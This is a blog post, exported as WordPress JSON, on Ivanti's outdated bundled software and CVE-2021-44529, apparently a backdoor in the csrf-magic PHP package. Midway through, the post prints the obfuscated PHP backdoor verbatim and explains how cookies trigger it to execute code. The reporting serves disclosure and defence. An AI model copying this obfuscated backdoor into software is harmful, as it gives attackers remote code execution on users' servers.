{"id":33301,"date":"2024-02-22T00:05:17","date_gmt":"2024-02-21T23:05:17","guid":{"rendered":"http:\/\/159.69.82.204\/win\/?p=33301"},"modified":"2025-02-04T20:20:08","modified_gmt":"2025-02-04T19:20:08","slug":"ivanti-endpoint-manager-vulnerability-cve-2021-44529-code-injection-or-backdoor","status":"publish","type":"post","link":"https:\/\/borncity.com\/win\/2024\/02\/22\/ivanti-endpoint-manager-vulnerability-cve-2021-44529-code-injection-or-backdoor\/","title":{"rendered":"Ivanti Endpoint Manager vulnerability CVE-2021-44529: Code injection or backdoor?"},"content":{"rendered":"<p><img decoding=\"async\" style=\"float: left; margin: 0px 10px 0px 0px; display: inline;\" title=\"Sicherheit (Pexels, allgemeine Nutzung)\" src=\"https:\/\/www.borncity.com\/blog\/wp-content\/uploads\/2021\/04\/Sicherheit_klein.jpg\" alt=\"Sicherheit (Pexels, allgemeine Nutzung)\" width=\"200\" align=\"left\" \/>[<a href=\"https:\/\/www.borncity.com\/blog\/2024\/02\/21\/ivanti-endpoint-manager-schwachstelle-cve-2021-44529-code-injection-oder-backdoor\/\" target=\"_blank\" rel=\"noopener\">German<\/a>]New scandal surrounding Ivanti Endpoint Manager. In 2021, Ivanti closed a security vulnerability CVE-2021-44529 in the product known as \"code injection\". There were rumors that it was a backdoor in an open source project. A security researcher then took another closer look at the code and made some astonishing discoveries.<\/p>\n<p><!--more--><\/p>\n<h2>Ivanti products as a night mare<\/h2>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/vg06.met.vgwort.de\/na\/9ad6f34ab9174a0ab634356dcbff60d6\" alt=\"\" width=\"1\" height=\"1\" \/>Ivanti products seems to become a new night mare for administrators, because many vulnerabilities has been uncovered from January 2024. The reasons are slowly becoming clearer.<\/p>\n<h3>US CISA let decommission ICS<\/h3>\n<p>In my German blog post \u00a0<a href=\"https:\/\/www.borncity.com\/blog\/2024\/02\/06\/kleine-warnung-finger-weg-von-ivanti-vpn\/\" target=\"_blank\" rel=\"noopener\">Kleine Warnung: Finger weg von Ivanti VPN; die benutzen wohl Uralt-Tools mit<\/a> I reported on February 6, 2024, that the US Cybersecurity Agency (CISA) has instructed US authorities to decommission Ivanti Connect Secure (ICS) by February 2, 2024 (if not the latest software version has been installed). The colleagues from Bleeping Computer have published something about this <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/cisa-orders-federal-agencies-to-disconnect-ivanti-vpn-appliances-by-saturday\/\" target=\"_blank\" rel=\"noopener\">here<\/a>. The CISA directive in question can be read <a href=\"https:\/\/www.cisa.gov\/news-events\/directives\/supplemental-direction-v1-ed-24-01-mitigate-ivanti-connect-secure-and-ivanti-policy-secure\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<h3>Ivanti ships old stuff<\/h3>\n<p>Within my blog post I addressed another topic. Ivanti ships it's products with outdated software \/ libraries. Security researcher Will Dormann took a closer look at Ivanti VPN and made some astonishing discoveries.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/i.postimg.cc\/sgc9DQHB\/image.png\" \/><\/p>\n<p>A recent installation of Ivanti VPN software (referred to as Ivanti VPN box) comes with a curl implementation that was updated 14 years ago. Regarding curl 7.19.7, <a href=\"https:\/\/curl.se\/docs\/vuln-7.19.7.html\" target=\"_blank\" rel=\"noopener\">this page<\/a> tells me that the version rolled out on November 4, 2009 has 61 security issues. These include an <a href=\"https:\/\/curl.se\/docs\/CVE-2022-27776.html\" target=\"_blank\" rel=\"noopener\">Auth\/cookie leak<\/a> in redirects.<\/p>\n<p>An OpenSSL 1.0.2n-fips is already six years old, the 1.0.2 has not received any updates since January 1, 2020. Perl implementation perl 5.6.1 has been around for 23 years with <a href=\"https:\/\/www.cybersecurity-help.cz\/vdb\/perl\/perl\/5.6.1\/\" target=\"_blank\" rel=\"noopener\">these vulnerabilities<\/a>. And psql 9.6.14 is five years old (<a href=\"https:\/\/www.postgresql.org\/support\/security\/9.6\/\" target=\"_blank\" rel=\"noopener\">here<\/a> is the list of horrors with the note \"You are currently viewing PostgreSQL security vulnerabilities for an unsupported version. If you are still using PostgreSQL 9.6, you should upgrade as soon as possible.\"). Any questions? With such \"additions\", there is no longer any need for security vulnerabilities to be closed. The product seems to be a single security nightmare.<\/p>\n<p>On Feb. 16, 2024, I've published the German blog post\u00a0<a href=\"https:\/\/www.borncity.com\/blog\/2024\/02\/16\/ivantis-uralter-software-klump-fllt-auch-sicherheitsforschern-auf\/\" target=\"_blank\" rel=\"noopener\">Ivantis uralter Software-Klump \u2013 f\u00e4llt auch Sicherheitsforschern auf<\/a>. Also security researchers from Eclypsiusm, who looked at Ivanti Pulse Secure firmware version 9.1.18.2-24467.1, has seen this nightmare. They <a href=\"https:\/\/eclypsium.com\/blog\/flatlined-analyzing-pulse-secure-firmware-and-bypassing-integrity-checking\/\" target=\"_blank\" rel=\"noopener\">discovered<\/a> that Ivanti Pulse Secure uses CentOS 6.4, which was withdrawn from support in November 2020.<\/p>\n<h2>CVE-2021-44529 in Ivanti Endpoint Manager<\/h2>\n<p>I hadn't covered it here on the blog as Ivanti 2021 wasn't on my radar yet (it came to my radar during the hack of Norway's governments, see <a href=\"https:\/\/borncity.com\/win\/2023\/07\/27\/patch-your-ivanti-epmm-norwegian-government-hacked-via-0-day\/\">Patch your Ivanti EPMM \u2013 Norwegian government hacked via 0-day<\/a>). On December 8, 2021, there was a warning about the vulnerability <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-44529\" target=\"_blank\" rel=\"noopener\">CVE-2021-44529<\/a>, a code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA). This allows an unauthenticated user to execute arbitrary code with restricted rights (nobody).<\/p>\n<p>This concerned Ivanti Endpoint Manager CSA version 4.5 and 4.6. Ivanti issued <a href=\"https:\/\/web.archive.org\/web\/20240930022930\/https:\/\/forums.ivanti.com\/s\/article\/SA-2021-12-02?language=en_US\" target=\"_blank\" rel=\"noopener\">this security advisory<\/a> on December 2, 2021. It also contains information on updates and countermeasures. PacketStorm Security then published a <a href=\"https:\/\/packetstormsecurity.com\/files\/170590\/Ivanti-Cloud-Services-Appliance-CSA-Command-Injection.html\" target=\"_blank\" rel=\"noopener\">follow-up article<\/a> on the vulnerability on January 18, 2023, which contained a <a href=\"https:\/\/en.wikipedia.org\/wiki\/Metasploit\" target=\"_blank\" rel=\"noopener\">metasploit<\/a> for the vulnerability.<\/p>\n<h2>Backdoor or code injection vulnerability?<\/h2>\n<p>I just came across new information via the following tweet. Ron Bowes from Greynoise Labs has taken another look at the vulnerability and the source code. This was possible because Ivanti used open source software in its product. The background to this was that security expert <a href=\"https:\/\/twitter.com\/haxor31337\">Tuan Anh Nguyen<\/a> <a href=\"https:\/\/twitter.com\/haxor31337\/status\/1507182030727135236\" target=\"_blank\" rel=\"noopener\">wrote<\/a> in March 2022 that he was certain that the vulnerability had been introduced into the software as a backdoor. The following tweet already reveals the point:<\/p>\n<p><a href=\"https:\/\/twitter.com\/arekfurt\/status\/1760056532387995934\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" src=\"https:\/\/i.postimg.cc\/k42bBMpp\/image.png\" \/><\/a><\/p>\n<p>Ron Bowes investigated this suspicion, did some research and used the Way Back Machine to find out more about the code of the package in question. If I have understood correctly, it is <a href=\"https:\/\/github.com\/ezyang\/csrf-magic\" target=\"_blank\" rel=\"noopener\">csrf-magic<\/a>, a package that is supposed to prevent a <a href=\"https:\/\/en.wikipedia.org\/wiki\/Cross-site_request_forgery\" target=\"_blank\" rel=\"noopener\">cross-site request forgery attack<\/a> in PHP. He came across an archive from March 2022 via the Way Back Machine, but the last commit was from February 2014.<\/p>\n<p>The security researcher then began to search the source code for a backdoor. His assumption was that the backdoor was carefully hidden in the code. But he found it at the end of the file in the source code.<\/p>\n<pre>\/\/ Obscure Tokens\r\n$aeym=\"RlKHfsByZWdfcmVwfsbGFjZShhcnJheSgnLfs1teXHc9fsXHNdLyfscsJy9fsccy8nfsKSwgYXJyfsYXkoJycsfsJysn\";\r\n$lviw = str_replace(\"m\",\"\",\"msmtmr_mrmemplmamcme\");\r\n$bbhj=\"JGMofsJGEpPjMpefsyRrPSdjMTIzJzfstlfsY2hvICc8Jy4kay4nPic7ZXfsZfshbChiYXNlNjRfZGVjb2\";\r\n$hpbk=\"fsJGfsM9fsJ2NvdW50fsJzfsskYfsT0kXfs0NPT0tJRTtpZihyfsZfsXNldfsCgfskYfsSkfs9fsPSdhYicgJiYg\";\r\n$rvom=\"KSwgam9pbihhcnfsJheV9zbGljZSgkYSwkYyfsgkYSktMyfskpfsKSkpOfs2VjaG8gJzwvJy4fskay4nPic7fQ==\";\r\n$xytu = $lviw(\"oc\", \"\", \"ocbocaocseoc6oc4_ocdoceoccocoocdoce\");\r\n$murp = $lviw(\"k\",\"\",\"kckrkeaktkek_kfkunkcktkikokn\");\r\n$zmto = $murp('', $xytu($lviw(\"fs\", \"\", $hpbk.$bbhj.$aeym.$rvom))); $zmto();<\/pre>\n<p>He began to analyze the code above and came to the conclusion that the backdoor was there. This requires at least 4 cookies for the code injection attack. The first cookie must have the value \"ab\", and the last three cookies are concatenated, decoded as lightly encrypted base64 and executed. Ron Bowes has published his findings in the article <a href=\"https:\/\/www.labs.greynoise.io\/grimoire\/2024-02-what-is-this-old-ivanti-exploit\/\" target=\"_blank\" rel=\"noopener\">Code injection or backdoor: A new look at Ivanti's CVE-2021-44529<\/a> .<\/p>\n<p>In the worst case, the vulnerability CVE-2021-44529, ultimately probably a backdoor, has been in the open source module for seven years. And it seems to be quite easy to write an exploit for this vulnerability. How this code got into the project and why it was not noticed remained a mystery. But the case indicates, that Ivanti does not have security under control.<\/p>\n<p><strong>Similar articles:<br \/>\n<\/strong><a href=\"https:\/\/borncity.com\/win\/2024\/02\/02\/ivanti-connect-secure-new-vulnerabilities-cve-2024-21888-and-cve-2024-21893-patched\/\" rel=\"bookmark\">Ivanti Connect Secure: New vulnerabilities CVE-2024-21888 and CVE-2024-21893 patched<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/win\/2023\/08\/27\/palo-alto-ivanti-endpoint-manager-mobile-vulnerabilities-readback-august-2023\/\" rel=\"bookmark\">Palo Alto: Ivanti Endpoint Manager Mobile Vulnerabilities Readback (August 2023)<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/win\/2024\/02\/02\/ivanti-connect-secure-new-vulnerabilities-cve-2024-21888-and-cve-2024-21893-patched\/\" rel=\"bookmark\">Ivanti Connect Secure: New vulnerabilities CVE-2024-21888 and CVE-2024-21893 patched<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[German]New scandal surrounding Ivanti Endpoint Manager. In 2021, Ivanti closed a security vulnerability CVE-2021-44529 in the product known as \"code injection\". There were rumors that it was a backdoor in an open source project. A security researcher then took another &hellip; <a href=\"https:\/\/borncity.com\/win\/2024\/02\/22\/ivanti-endpoint-manager-vulnerability-cve-2021-44529-code-injection-or-backdoor\/\">Continue reading <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[580,1547],"tags":[69,1544],"class_list":["post-33301","post","type-post","status-publish","format-standard","hentry","category-security","category-software","tag-security","tag-software"],"_links":{"self":[{"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/posts\/33301","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/comments?post=33301"}],"version-history":[{"count":3,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/posts\/33301\/revisions"}],"predecessor-version":[{"id":37052,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/posts\/33301\/revisions\/37052"}],"wp:attachment":[{"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/media?parent=33301"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/categories?post=33301"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/tags?post=33301"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}